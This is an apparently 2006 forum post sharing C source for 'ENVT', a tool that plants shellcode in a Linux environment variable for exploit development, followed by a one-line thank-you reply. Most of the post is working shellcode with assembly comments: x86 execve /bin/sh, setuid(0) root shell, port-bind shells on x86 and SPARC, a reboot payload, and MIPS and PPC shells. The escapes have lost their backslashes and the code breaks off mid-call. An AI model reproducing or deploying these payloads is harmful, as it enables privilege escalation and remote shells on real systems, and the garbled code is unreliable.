darkking Posted September 18, 2006 Report Share Posted September 18, 2006 Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs ,this tool injects shellcodes into linux environment and uses these shellcodesfor exploit developing , maybe IDS detections or testing and other stuff ....[ SIGINT , SIGHUP , SIGABRT handlers added ]/** Qnix <Qnix@bsdmail.org>* ENVT v0.01** */#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <string.h>#define VERSION "v0.1"#define MAX_SIZE 1024#define SHSIZE 512#define bash "/bin/bash"/* Prototype */void getenvaddr(char *environment);void help(char *string);void setshenv(int shellcode);/****************** START OF SHELLCODES ******************/char execve_binbash[] ="x31xc0" // xor %eax, %eax"x50" // push %eax"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x50" // push %eax"x53" // push %ebx"x89xe1" // mov %esp, %ecx"x31xd2" // xor %edx, %edx"xb0x0b" // mov $0xb, %al"xcdx80"; // int $0x80char execve_setuid_setgid_bb[] ="x6ax17" // push $0x17"x58" // pop %eax"x31xdb" // xor %ebx, %ebx"xcdx80" // int $0x80"x6ax2e" // push $0x2e"x58" // pop %eax"x53" // push %ebx"xcdx80" // int $0x80"x31xd2" // xor %edx, %edx"x6ax0b" // push $0xb"x58" // pop %eax"x52" // push %edx"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x52" // push %edx"x53" // push %ebx"x89xe1" // mov %esp, %ecx"xcdx80"; // int $0x80char portbind_64713[] =/* socket(AF_INET, SOCK_STREAM, 0) */"x6ax66" // push $0x66"x58" // pop %eax"x6ax01" // push $0x1"x5b" // pop %ebx"x99" // cltd"x52" // push %edx"x53" // push %ebx"x6ax02" // push $0x2"x89xe1" // mov %esp,%ecx"xcdx80" // int $0x80/* bind(s, server, sizeof(server)) */"x52" // push %edx"x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713"x66x6ax02" // pushw $0x2"x89xe1" // mov $esp,%ecx"x6ax10" // push $0x10"x51" // push %ecx"x50" // push %eax"x89xe1" // mov %esp,%ecx"x89xc6" // mov %eax,%esi"x43" // inc %ebx"xb0x66" // mov $0x66,%al"xcdx80" // int $0x80/* listen(s, anything) */"xb0x66" // mov $0x66,%al"xd1xe3" // shl %ebx"xcdx80" // int $0x80/* accept(s, 0, 0) */"x52" // push %edx"x56" // push %esi"x89xe1" // mov %esp,%ecx"x43" // inc %ebx"xb0x66" // mov $0x66,%al"xcdx80" // int $0x80"x93" // xchg %eax,%ebx/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */"x6ax02" // push $0x2"x59" // pop %ecx"xb0x3f" // mov $0x3f,%al"xcdx80" // int $0x80"x49" // dec %ecx"x79xf9" // jns dup_loop/* execve("/bin/sh", ["/bin/sh"], NULL) */"x6ax0b" // push $0xb"x58" // pop %eax"x52" // push %edx"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x52" // push %edx"x53" // push %ebx"x89xe1" // mov %esp, %ecx"xcdx80"; // int $0x80char reboot_20[] ="x6ax58" // push $0x58"x58" // pop %eax"xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx"xb9x69x19x12x28" // mov $0x28121969,%ecx"xbax67x45x23x01" // mov $0x1234567,%edx"xcdx80"; // int $0x80char sparc_portbind[]="x9dxe3xbfx78" // save %sp, -136, %sp"x90x10x20x02" // mov 2, %o0"x92x10x20x01" // mov 1, %o1"x94x22x80x0a" // sub %o2, %o2, %o2"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x01" // mov 1, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]"x90x10x20x02" // mov 2, %o0"xd0x37xbfxd8" // sth %o0, [ %fp + -40 ]"x13x08xc8xc8" // sethi %hi(0x23232000), %o1"x90x12x63x0f" // or %o1, 0x30f, %o0"xd0x37xbfxda" // sth %o0, [ %fp + -38 ]"xc0x27xbfxdc" // clr [ %fp + -36 ]"x92x07xbfxd8" // add %fp, -40, %o1"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0"x94x10x20x10" // mov 0x10, %o2"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x02" // mov 2, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0"x92x10x20x05" // mov 5, %o1"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"x90x10x20x04" // mov 4, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"x92x07xbfxd8" // add %fp, -40, %o1"x94x07xbfxec" // add %fp, -20, %o2"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x05" // mov 5, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x27xbfxf0" // st %o0, [ %fp + -16 ]"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x22x40x09" // sub %o1, %o1, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x10x20x01" // mov 1, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x10x20x02" // mov 2, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6"xacx15xa1x6e" // or %l6, 0x16e, %l6"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7"x90x0bx80x0e" // and %sp, %sp, %o0"x92x03xa0x08" // add %sp, 8, %o1"x94x22x80x0a" // sub %o2, %o2, %o2"x9cx03xa0x10" // add %sp, 0x10, %sp"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]"xc0x23xbfxfc" // clr [ %sp + -4 ]"x82x10x20x3b" // mov 0x3b, %g1"x91xd0x20x10"; // ta 0x10char mips_sh[] =/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */"xffxffx10x04xabx0fx02x24""x55xf0x46x20x66x06xffx23""xc2xf9xecx23x66x06xbdx23""x9axf9xacxafx9exf9xa6xaf""x9axf9xbdx23x21x20x80x01""x21x28xa0x03xccxcdx44x03""/bin/sh";char ppc_sh[] ="x7cx3fx0bx78" /*mr r31,r1*/"x7cxa5x2ax79" /*xor. r5,r5,r5*/"x42x40xffxf9" /*bdzl+ 10000454<main>*/"x7fx08x02xa6" /*mflr r24*/"x3bx18x01x34" /*addi r24,r24,308*/"x98xb8xfexfb" /*stb r5,-261(r24)*/"x38x78xfexf4" /*addi r3,r24,-268*/"x90x61xffxf8" /*stw r3,-8(r1)*/"x38x81xffxf8" /*addi r4,r1,-8*/"x90xa1xffxfc" /*stw r5,-4(r1)*/"x3bxc0x01x60" /*li r30,352*/"x7fxc0x2ex70" /*srawi r0,r30,5*/"x44xdexadxf2" /*.long 0x44deadf2*/"/bin/shZ"; // the last byte becomes NULL/****************** END OF SHELLCODES ******************/int main(int argc, char *argv[]) {int c;char buf1[MAX_SIZE];char *addr = getenv("ENVT");int buf1i;extern char *optarg;extern int optind, optopt;if(addr != NULL) {getenvaddr(addr);exit(0);}if(argc < 2) {help(argv[0]);}while((c = getopt(argc, argv, ":s:lhv")) != -1) {switch© { case 'v': version(); break; case 'h': help(argv[0]); case 'l': shellcode_list(); break; case 's': strncpy(buf1,optarg,MAX_SIZE-1); buf1i = atoi(buf1); setshenv(buf1i); break; case ':': fprintf(stderr,"Option -%c requires an operandn",optopt); break; }}return(0);}/** Display version .** */int version() {fprintf(stdout,"ENVT %sn",VERSION);fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n");exit(0);}/** Display help .** */void getenvaddr(char *environment) {fprintf(stdout,"SHELLCODE FOUND IN %pn",environment);}void help(char *string) {fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string);exit(0);}/** Display shellcode list .** */int shellcode_list() {fprintf(stdout,"nttt::[ LINUX/x86 ]::n");fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn");fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn");fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn");fprintf(stdout,"ttt::[ LINUX/SPARC ]::n");fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn");fprintf(stdout,"ttt::[ LINUX/MIPS ]::n");fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn");fprintf(stdout,"ttt::[ LINUX/PPC ]::n");fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn");exit(0);}/** Set Shellcode in environment .** */void setshenv(int shellcode) {char *addr = getenv("ENVT"); // Use to get shellcode addrchar execvebb[sHSIZE]; // Use for shellcode(1)char setugbb[sHSIZE]; // Use for shellcode(2)char portbind[sHSIZE]; // Use for shellcode(3)char reboot[sHSIZE]; // Use for shellcode(4)char sparc1[sHSIZE]; // Use for shellcode(5)char mips1[sHSIZE]; // Use for shellcode(6)char ppc1[sHSIZE]; // Use for shellcode(7)if(shellcode >= 8) {fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);exit(0);}/* Shellcode number 1 */if(shellcode == 1) {fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");fprintf(stdout,"[+]t Setting memory for the shellcode .n");memset(execvebb,0x90,SHSIZE);fprintf(stdout,"[+]t Copying shellcode to memory .n");memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));memcpy(execvebb,"ENVT=",5);fprintf(stdout,"[+]t Putting shellcode in the environment .n");putenv(execvebb);fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));execl(bash, bash, ' Quote Link to comment Share on other sites More sharing options...
DarkWizzard Posted September 18, 2006 Report Share Posted September 18, 2006 Frumos.Foarte fain.Multumesc. Quote Link to comment Share on other sites More sharing options...